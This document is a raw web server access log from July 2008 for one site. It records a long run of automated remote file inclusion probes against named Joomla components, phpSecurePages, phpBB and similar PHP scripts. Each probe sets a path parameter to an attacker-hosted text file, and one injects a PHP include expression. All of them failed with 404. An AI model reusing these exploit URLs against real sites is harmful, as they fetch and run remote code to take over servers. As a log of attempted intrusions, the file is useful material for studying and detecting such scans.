64.246.22.32 - - [06/Jul/2008:17:49:51 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
64.246.22.32 - - [06/Jul/2008:17:49:51 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
64.246.22.32 - - [06/Jul/2008:17:49:51 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.114.141.30 - - [06/Jul/2008:17:50:52 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.radioroedovre.dk//oneadmin/_files/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.114.141.30 - - [06/Jul/2008:17:50:52 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.radioroedovre.dk//oneadmin/_files/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.114.141.30 - - [06/Jul/2008:17:50:53 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.radioroedovre.dk//oneadmin/_files/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
91.186.4.164 - - [06/Jul/2008:17:51:30 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
91.186.4.164 - - [06/Jul/2008:17:51:30 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
66.246.218.239 - - [06/Jul/2008:17:52:09 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.uscbhs81.com/main//modules/Flashgames/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
66.246.218.239 - - [06/Jul/2008:17:52:09 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.uscbhs81.com/main//modules/Flashgames/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
66.246.218.239 - - [06/Jul/2008:17:52:10 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.uscbhs81.com/main//modules/Flashgames/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.246.22.32 - - [06/Jul/2008:17:52:30 -0700] "GET /logs/access_080211.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
64.246.22.32 - - [06/Jul/2008:17:52:31 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
64.246.22.32 - - [06/Jul/2008:17:52:31 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
64.246.22.32 - - [06/Jul/2008:17:52:32 -0700] "GET /logs/access_080211.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
64.246.22.32 - - [06/Jul/2008:17:52:32 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
64.246.22.32 - - [06/Jul/2008:17:52:32 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
82.98.78.150 - - [06/Jul/2008:17:53:07 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
193.254.184.51 - - [06/Jul/2008:17:53:12 -0700] "GET /logs/access.log/avatar.php?page=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
193.254.184.51 - - [06/Jul/2008:17:53:12 -0700] "GET /logs/access.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
193.254.184.51 - - [06/Jul/2008:17:53:12 -0700] "GET /avatar.php?page=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
193.254.184.51 - - [06/Jul/2008:17:53:13 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
193.254.184.51 - - [06/Jul/2008:17:53:13 -0700] "GET /logs/avatar.php?page=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
193.254.184.51 - - [06/Jul/2008:17:53:14 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
222.251.223.180 - - [06/Jul/2008:17:53:46 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
217.17.17.82 - - [06/Jul/2008:17:53:51 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.informatizados.es/docs/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.neighborhoodglimpses.com"
217.17.17.82 - - [06/Jul/2008:17:53:51 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://5score.org/calendar/info/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.neighborhoodglimpses.com"
217.17.17.82 - - [06/Jul/2008:17:53:52 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.informatizados.es/docs/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.neighborhoodglimpses.com"
217.17.17.82 - - [06/Jul/2008:17:53:52 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://5score.org/calendar/info/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.neighborhoodglimpses.com"
70.84.182.98 - - [06/Jul/2008:17:53:54 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
70.84.182.98 - - [06/Jul/2008:17:53:54 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
70.84.182.98 - - [06/Jul/2008:17:53:55 -0700] "GET /logs/access_080211.log//phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
87.117.238.16 - - [06/Jul/2008:17:53:55 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
87.117.238.16 - - [06/Jul/2008:17:53:55 -0700] "GET /logs/access_080211.log//phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
87.117.238.16 - - [06/Jul/2008:17:53:55 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
222.251.223.180 - - [06/Jul/2008:17:54:22 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
66.246.218.239 - - [06/Jul/2008:17:55:06 -0700] "GET /logs/access_080211.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.uscbhs81.com/main//modules/Flashgames/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
66.246.218.239 - - [06/Jul/2008:17:55:06 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.uscbhs81.com/main//modules/Flashgames/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
66.246.218.239 - - [06/Jul/2008:17:55:06 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.uscbhs81.com/main//modules/Flashgames/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:17:55:21 -0700] "GET /logs/access_080211.log//phpSecurePages/secure.php?&cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:17:55:22 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
87.117.238.16 - - [06/Jul/2008:17:55:32 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
87.117.238.16 - - [06/Jul/2008:17:55:32 -0700] "GET /logs/access.log//phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
87.117.238.16 - - [06/Jul/2008:17:55:32 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.85.96.130 - - [06/Jul/2008:17:55:40 -0700] "GET /logs/access_080225.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "neighborhoodglimpses.com"
70.85.96.130 - - [06/Jul/2008:17:55:40 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "neighborhoodglimpses.com"
70.85.96.130 - - [06/Jul/2008:17:55:40 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "neighborhoodglimpses.com"
82.98.78.150 - - [06/Jul/2008:17:56:34 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
70.84.182.98 - - [06/Jul/2008:17:56:35 -0700] "GET /logs/access.log//phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.182.98 - - [06/Jul/2008:17:56:36 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.182.98 - - [06/Jul/2008:17:56:36 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:17:56:39 -0700] "GET /logs/access_080211.log//phpSecurePages/secure.php?&cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:17:56:39 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:17:56:40 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
193.254.184.51 - - [06/Jul/2008:17:56:53 -0700] "GET /logs/access_080211.log/avatar.php?page=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "neighborhoodglimpses.com"
193.254.184.51 - - [06/Jul/2008:17:56:53 -0700] "GET /logs/access_080211.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "neighborhoodglimpses.com"
193.254.184.51 - - [06/Jul/2008:17:56:54 -0700] "GET /avatar.php?page=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "neighborhoodglimpses.com"
193.254.184.51 - - [06/Jul/2008:17:56:54 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "neighborhoodglimpses.com"
193.254.184.51 - - [06/Jul/2008:17:56:55 -0700] "GET /logs/avatar.php?page=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "neighborhoodglimpses.com"
193.254.184.51 - - [06/Jul/2008:17:56:55 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "neighborhoodglimpses.com"
85.114.141.30 - - [06/Jul/2008:17:57:48 -0700] "GET /logs/access_080211.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.radioroedovre.dk//oneadmin/_files/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
85.114.141.30 - - [06/Jul/2008:17:57:48 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.radioroedovre.dk//oneadmin/_files/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
85.114.141.30 - - [06/Jul/2008:17:57:48 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.radioroedovre.dk//oneadmin/_files/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:17:58:12 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
89.108.67.216 - - [06/Jul/2008:17:58:16 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.108.67.216 - - [06/Jul/2008:17:58:31 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
70.84.182.98 - - [06/Jul/2008:18:01:10 -0700] "GET /logs/access.log/admincp/auth/checklogin.php?cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.182.98 - - [06/Jul/2008:18:01:10 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.182.98 - - [06/Jul/2008:18:01:10 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
66.76.60.39 - - [06/Jul/2008:18:01:18 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
66.76.60.39 - - [06/Jul/2008:18:01:19 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
66.76.60.39 - - [06/Jul/2008:18:01:19 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
87.117.238.16 - - [06/Jul/2008:18:01:48 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
87.117.238.16 - - [06/Jul/2008:18:01:48 -0700] "GET /logs/access.log/admincp/auth/checklogin.php?cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
87.117.238.16 - - [06/Jul/2008:18:01:48 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.182.98 - - [06/Jul/2008:18:02:46 -0700] "GET /logs/access_080211.log/admincp/auth/checklogin.php?cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
70.84.182.98 - - [06/Jul/2008:18:02:46 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
70.84.182.98 - - [06/Jul/2008:18:02:46 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
87.117.238.16 - - [06/Jul/2008:18:03:31 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
87.117.238.16 - - [06/Jul/2008:18:03:31 -0700] "GET /logs/access_080211.log/admincp/auth/checklogin.php?cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
87.117.238.16 - - [06/Jul/2008:18:03:31 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:18:04:02 -0700] "GET /logs/access.log/admincp/auth/checklogin.php?cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:18:04:07 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:18:04:08 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
88.255.236.6 - - [06/Jul/2008:18:07:04 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
88.255.236.6 - - [06/Jul/2008:18:07:06 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
200.6.155.114 - - [06/Jul/2008:18:08:05 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
200.6.155.114 - - [06/Jul/2008:18:08:27 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
194.58.78.39 - - [06/Jul/2008:18:08:51 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
66.76.60.39 - - [06/Jul/2008:18:09:10 -0700] "GET /logs/access_080211.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
66.76.60.39 - - [06/Jul/2008:18:09:10 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:18:09:48 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
59.126.46.141 - - [06/Jul/2008:18:10:51 -0700] "GET /logs/order/login.php?svr_rootscript=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
59.126.46.141 - - [06/Jul/2008:18:10:51 -0700] "GET /order/login.php?svr_rootscript=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
116.40.122.120 - - [06/Jul/2008:18:11:03 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
75.127.70.16 - - [06/Jul/2008:18:11:13 -0700] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.injoyusa.com/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
75.127.70.16 - - [06/Jul/2008:18:11:13 -0700] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.injoyusa.com/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
75.127.70.16 - - [06/Jul/2008:18:11:13 -0700] "GET /logs/access.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.injoyusa.com/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
59.126.46.141 - - [06/Jul/2008:18:11:50 -0700] "GET /logs/order/login.php?svr_rootscript=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
59.126.46.141 - - [06/Jul/2008:18:11:51 -0700] "GET /order/login.php?svr_rootscript=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
